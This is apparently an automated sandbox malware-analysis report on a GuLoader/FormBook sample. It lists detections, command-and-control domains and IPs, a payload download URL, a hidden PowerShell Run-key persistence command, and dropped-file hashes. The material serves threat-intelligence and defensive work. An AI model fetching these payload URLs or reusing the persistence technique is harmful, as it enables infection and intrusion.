                                network: www.eternalsunrise.xyz 66.29.135.159, 49751, 49752, 80 ADVANTAGECOMUS United States; n-benriya002.com 219.94.128.41, 49743, 49744, 49745 SAKURA-CSAKURAInternetIncJP Japan; 3 other IPs or domains
                                signatures: Found direct / indirect Syscall (likely to bypass EDR)
                            firefox.exe started
                    cmd.exe [1] started
                        conhost.exe started
                        reg.exe [1 1] started
                conhost.exe started
                cmd.exe [1] started

        Source | Detection | Scanner | Label
        160420241245287.exe | 11% | ReversingLabs | Win32.Trojan.GuLoader
        160420241245287.exe | 18% | Virustotal |
        160420241245287.exe | 100% | Joe Sandbox ML |

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\Untapestried.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Temp\Untapestried.exe | 11% | ReversingLabs | Win32.Trojan.GuLoader
        C:\Users\user\AppData\Local\Temp\Untapestried.exe | 18% | Virustotal |
        C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll | 1% | Virustotal |
        C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\tailors.ver | 0% | Virustotal |
        No Antivirus matches
        Source | Detection | Scanner | Label
        ejbodyart.com | 0% | Virustotal |
        n-benriya002.com | 0% | Virustotal |
        www.jt-berger.store | 2% | Virustotal |
        www.ejbodyart.com | 0% | Virustotal |

        Source | Detection | Scanner | Label
        http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
        https://contoso.com/License | 0% | URL Reputation | safe
        https://contoso.com/Icon | 0% | URL Reputation | safe
        https://contoso.com/ | 0% | URL Reputation | safe
        http://www.jt-berger.store/9pdo/ | 2% | Virustotal |
        http://www.n-benriya002.com/9pdo/ | 2% | Virustotal |
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Virustotal |
        http://www.scwspark.com/9pdo/ | 1% | Virustotal |
        http://103.14.155.180/CkkRLCTUxW193.bin | 8% | Virustotal |
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Virustotal |
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Virustotal |
        http://103.14.155.180/ | 3% | Virustotal |
        http://www.eternalsunrise.xyz/9pdo/ | 1% | Virustotal |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        ejbodyart.com | 112.175.50.218 | true | false | | unknown
        n-benriya002.com | 219.94.128.41 | true | false | | unknown
        www.scwspark.com | 81.88.63.46 | true | false | | unknown
        www.jt-berger.store | 217.160.0.183 | true | false | | unknown
        www.eternalsunrise.xyz | 66.29.135.159 | true | true | | unknown
        www.ejbodyart.com | unknown | unknown | true | | unknown
        www.n-benriya002.com | unknown | unknown | true | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        http://www.ejbodyart.com/9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= | false | | unknown
        http://www.jt-berger.store/9pdo/ | false | | unknown
        http://www.n-benriya002.com/9pdo/ | false | | unknown
        http://www.jt-berger.store/9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2 | false | | unknown
        http://www.n-benriya002.com/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2 | false | | unknown
        http://103.14.155.180/CkkRLCTUxW193.bin | false | | unknown
        http://www.scwspark.com/9pdo/ | false | | unknown
        http://www.scwspark.com/9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2 | false | | unknown
        http://www.eternalsunrise.xyz/9pdo/ | false | | unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabcmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://n-benriya002.com/9pdo/?edR0hF=REEnkW6Mcmd.exe, 0000000C.00000002.2889167441.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2888724701.00000000036B8000.00000004.00000001.00040000.00000000.sdmpfalse
                            unknown
                            https://duckduckgo.com/ac/?q=cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              unknown
URL | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.eternalsunrise.xyz | bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmp | false | - | unknown
https://contoso.com/License | powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.ftp.ftp://ftp.gopher. | Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp | false | - | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | 160420241245287.exe, Untapestried.exe.1.dr | false | - | high
https://www.ecosia.org/newtab/ | cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lBqq | powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://103.14.155.180/CkkRLCTUxW193.binO | Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://103.14.155.180/CkkRLCTUxW193.bin3c | Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://ac.ecosia.org/autocomplete?q= | cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | false | - | unknown
http://103.14.155.180/i | Untapestried.exe, 00000007.00000002.2158641488.000000000475D000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://103.14.155.180/It3 | Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp | false | - | unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | false | - | unknown
http://103.14.155.180/ | Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://103.14.155.180/NTIFIER=Intel64 | Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://103.14.155.180/CkkRLCTUxW193.bin. | Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
103.14.155.180 | unknown | unknown | 58451 | EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | false
219.94.128.41 | n-benriya002.com | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | false
66.29.135.159 | www.eternalsunrise.xyz | United States | 19538 | ADVANTAGECOMUS | true
81.88.63.46 | www.scwspark.com | Italy | 39729 | REGISTER-ASIT | false
217.160.0.183 | www.jt-berger.store | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
112.175.50.218 | ejbodyart.com | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1426828
Start date and time: 2024-04-16 17:15:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 160420241245287.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@17/54@5/6
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 84%
• Number of executed functions: 132
• Number of non-executed functions: 252
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7304 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
16:16:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lgplante %Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)
16:16:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lgplante %Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)
17:15:54 | API Interceptor | 43x Sleep call for process: powershell.exe modified
17:17:23 | API Interceptor | 631858x Sleep call for process: cmd.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
103.14.155.180 | 16042024124521.exe | malicious | FormBook, GuLoader | 103.14.155.180/bwphkvcX154.bin
103.14.155.180 | 2024164846750.exe | malicious | FormBook, GuLoader | 103.14.155.180/yYStJN62.bin
103.14.155.180 | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | 103.14.155.180/AJiUJeCwtysrVswj26.bin
103.14.155.180 | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | 103.14.155.180/bEtaNzB191.bin
103.14.155.180 | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 103.14.155.180/KFhYG187.bin
103.14.155.180 | zamowienie_002523.exe | malicious | FormBook, GuLoader | 103.14.155.180/YTtXUgP216.bin
219.94.128.41 | 2024164846750.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
219.94.128.41 | zamowienie_002523.exe | malicious | FormBook, GuLoader | www.n-benriya002.com/9pdo/
66.29.135.159 | 2024164846750.exe | malicious | FormBook, GuLoader | www.eternalsunrise.xyz/9pdo/
66.29.135.159 | file.exe | malicious | FormBook | www.quantumboulevard.xyz/qruc/
66.29.135.159 | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | www.eternalsunrise.xyz/9pdo/
66.29.135.159 | zamowienie_002523.exe | malicious | FormBook, GuLoader | www.eternalsunrise.xyz/9pdo/
66.29.135.159 | file.exe | malicious | FormBook | www.quantumboulevard.xyz/qruc/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.scwspark.com | 2024164846750.exe | malicious | FormBook, GuLoader | 81.88.63.46
www.scwspark.com | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 81.88.63.46
www.scwspark.com | zamowienie_002523.exe | malicious | FormBook, GuLoader | 81.88.63.46
www.eternalsunrise.xyz | 2024164846750.exe | malicious | FormBook, GuLoader | 66.29.135.159
www.eternalsunrise.xyz | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 66.29.135.159
www.eternalsunrise.xyz | zamowienie_002523.exe | malicious | FormBook, GuLoader | 66.29.135.159
www.jt-berger.store | 16042024124521.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 2024164846750.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 217.160.0.183
www.jt-berger.store | zamowienie_002523.exe | malicious | FormBook, GuLoader | 217.160.0.183
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ADVANTAGECOMUS | 2024164846750.exe | malicious | FormBook, GuLoader | 66.29.135.159
ADVANTAGECOMUS | file.exe | malicious | FormBook | 66.29.135.159
ADVANTAGECOMUS | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 66.29.135.159
ADVANTAGECOMUS | zamowienie_002523.exe | malicious | FormBook, GuLoader | 66.29.135.159
ADVANTAGECOMUS | file.exe | malicious | FormBook | 66.29.135.159
ADVANTAGECOMUS | copy_106_10210_31.exe | malicious | AgentTesla, PureLog Stealer, XWorm | 66.29.151.236
ADVANTAGECOMUS | 17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exe | malicious | AgentTesla | 66.29.159.53
ADVANTAGECOMUS | xnYuUw7KjK.exe | malicious | AgentTesla, PureLog Stealer | 66.29.151.236
ADVANTAGECOMUS | 0ekwLomWKo.exe | malicious | FormBook | 66.29.149.46
ADVANTAGECOMUS | https://legranrd.com/GeVAcs | malicious | HTMLPhisher | 66.29.148.78
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | 16042024124521.exe | malicious | FormBook, GuLoader | 103.14.155.180
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | 2024164846750.exe | malicious | FormBook, GuLoader | 103.14.155.180
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | 103.14.155.180
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | 103.14.155.180
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 103.14.155.180
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | zamowienie_002523.exe | malicious | FormBook, GuLoader | 103.14.155.180
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | f9hHTjsZdf.exe | malicious | Unknown | 103.243.100.13
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | f9hHTjsZdf.exe | malicious | Unknown | 103.243.100.13
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | 54Z6ldWRL5.exe | malicious | Unknown | 103.243.100.13
EASYHOST-HKEASYHOSTSOLUTIONLIMITEDHK | 54Z6ldWRL5.exe | malicious | Unknown | 103.243.100.13
SAKURA-CSAKURAInternetIncJP | https://ruv80zbas1.execute-api.us-east-1.amazonaws.com/prod/jump?redirect_url=http://bs-nakagawa.com/PMxdv77xgwVSyGqqOWzi/62df5bbd4291fb27f637dee413562c6e/bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&creative_id=601&tag_name=Rob_A_Facebook&operative_id=33090 | malicious | HTMLPhisher | 183.90.246.80
SAKURA-CSAKURAInternetIncJP | 2024164846750.exe | malicious | FormBook, GuLoader | 219.94.128.41
SAKURA-CSAKURAInternetIncJP | S#U0130PAR#U0130S_0453.exe | malicious | FormBook, GuLoader | 219.94.128.41
SAKURA-CSAKURAInternetIncJP | 2024041342836038.EXE.exe | malicious | FormBook, GuLoader | 219.94.128.41
SAKURA-CSAKURAInternetIncJP | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 219.94.128.41
SAKURA-CSAKURAInternetIncJP | 994LJMbRxE.elf | malicious | Mirai | 157.112.148.13
SAKURA-CSAKURAInternetIncJP | zamowienie_002523.exe | malicious | FormBook, GuLoader | 219.94.128.41
SAKURA-CSAKURAInternetIncJP | http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=clickme.thryv.com/ls/click?upn=u001.zNsZ6DgZGUlz4SyL2q0KgfvLUZd1vxrIdCMo5dY5qCEyeaGmNINChKOlELp3fRT1rsLBxEJdRXYvy6S-2BGEY7uicd3tbSMV5oJVhczVlIJxNtA-2BurH4j6WXNUMDWH8Xtyor4mjkn1VIVtPJTCW3IlMRG3a4MIeGKbPJD2WFpltpzviF50nMF1DDbgC9X6S9w9Hlc1oLQOQrL-2F5NOag02nHzFb0iLScFwtYhl7ivMYLz0-3DlYp0_JVAtn8RK-2FYGAFwojudbatEe6kKijRrOmSDoK71rQZxdvCfQSeCo-2BRBdkQ5VWb782IaijolxlNh8UaJUpVC3oTrBWLQ0nDIwqRnMGXEH-2FVvabEpl0ypWmwFSXmHQXgR2OtjYxsjQq8JqnCS0xJ6x5Hw2KTEpFQlfF7UILlGxlM8XnIewK-2FaJufFXkpj77DIQAUJIbbgxdsd6A82g6UCqhJrLxeAFCIG7p5DQ3gDp3jrTu2g01Y1dJ78akz0sR2ouRL8yC2fH0p3U5mmt7xctz27iCjzyIwMztlvkJaOc0tsUXBISBrbO3CkhbRwyYHpkDtiv91MtbaUTYJ4SSBMc4tw4DQdyflUkkcsGLNoBKOnZYoBecXCGDUCOXb8bLi9mYrh-2F2YZwAXwNbq-2BqqypetrxX-2BFRmar-2F5nHTrF20p1pew-3D#a3Jvc3NAbW9udGFnZWdvbGRjb3JwLmNvbQ== | malicious | Unknown | 120.136.14.8
SAKURA-CSAKURAInternetIncJP | 240330_unpacked | malicious | Unknown | 219.94.162.171
SAKURA-CSAKURAInternetIncJP | u82QW5hCzv.elf | malicious | Mirai | 112.78.226.183
REGISTER-ASIT | 2024164846750.exe | malicious | FormBook, GuLoader | 81.88.63.46
REGISTER-ASIT | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 81.88.63.46
REGISTER-ASIT | Ordin de plat#U0103.exe | malicious | FormBook | 81.88.63.46
REGISTER-ASIT | zamowienie_002523.exe | malicious | FormBook, GuLoader | 81.88.63.46
REGISTER-ASIT | mrPTE618YB.exe | malicious | PureLog Stealer | 195.110.124.188
REGISTER-ASIT | yx0H3RO9ur.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Trsten.vbs | malicious | FormBook, GuLoader | 81.88.57.68
REGISTER-ASIT | Grundforbedre39.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | venerationens.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | CATALOG LISTs#U180ex#U180el#U180ex#U180e..exe | malicious | FormBook | 81.88.48.71
                                                                      No context
                                                                      No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.838950934453595
Encrypted: false
SSDEEP: 192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5: 4C24412D4F060F4632C0BD68CC9ECB54
SHA1: 3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256: 411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512: 6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious: false
Reputation: moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):114688
                                                                      Entropy (8bit):0.9746603542602881
                                                                      Encrypted:false
                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):906138
                                                                      Entropy (8bit):6.629085334913185
                                                                      Encrypted:false
                                                                      SSDEEP:24576:HDgVtWN/pm/avooyRDtwZk8D2RncNogPgct/R:cpoxZDmndct/R
                                                                      MD5:0FAF0632777806D9E8C13F1CA6FC3237
                                                                      SHA1:35FEA792D63BA1E9DEEC1D2988BC6456322772D5
                                                                      SHA-256:4585D06CB13DE01241BF014DB8D49149DE7A77A9A0DC13B9007D08A402A035B3
                                                                      SHA-512:CFF4A23F7CA212A65C02737FEEC510CC4187586D2A4688747563F283ED5E31AB15FB92D05A609354FE8502D033C2839AF1C3F9127A2C3F3390C6823E5B741D78
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 11%
• Antivirus: Virustotal, Detection: 18%
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\Desktop\160420241245287.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):6656
                                                                      Entropy (8bit):5.171331646509506
                                                                      Encrypted:false
                                                                      SSDEEP:96:E7fhZwXd8KgEbAa9PweF1WxD8ZLMJGgmkN738:5N8KgWAuLWxD8ZAGgmkN
                                                                      MD5:1128EE61DFFA0A97D30B2F828235B289
                                                                      SHA1:B552F3D4F13894F2F30FB446893093CA78FE149C
                                                                      SHA-256:1E33DECAC84BDD2B3A651C969258F8E6C90616E9EC35DE6AB4F402709555CE4C
                                                                      SHA-512:D470356BE436997FC53C17B8546CC80B187538AD2F258788761B92C28D91EF733FE6D8B3B33C353D84D1E0AE089207EFD1EBFDE33A6D33D5A341960E7BCFC8F5
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 1%
                                                                      Process:C:\Users\user\Desktop\160420241245287.exe
                                                                      File Type:OpenPGP Public Key
                                                                      Category:dropped
                                                                      Size (bytes):583097
                                                                      Entropy (8bit):6.989964048235635
                                                                      Encrypted:false
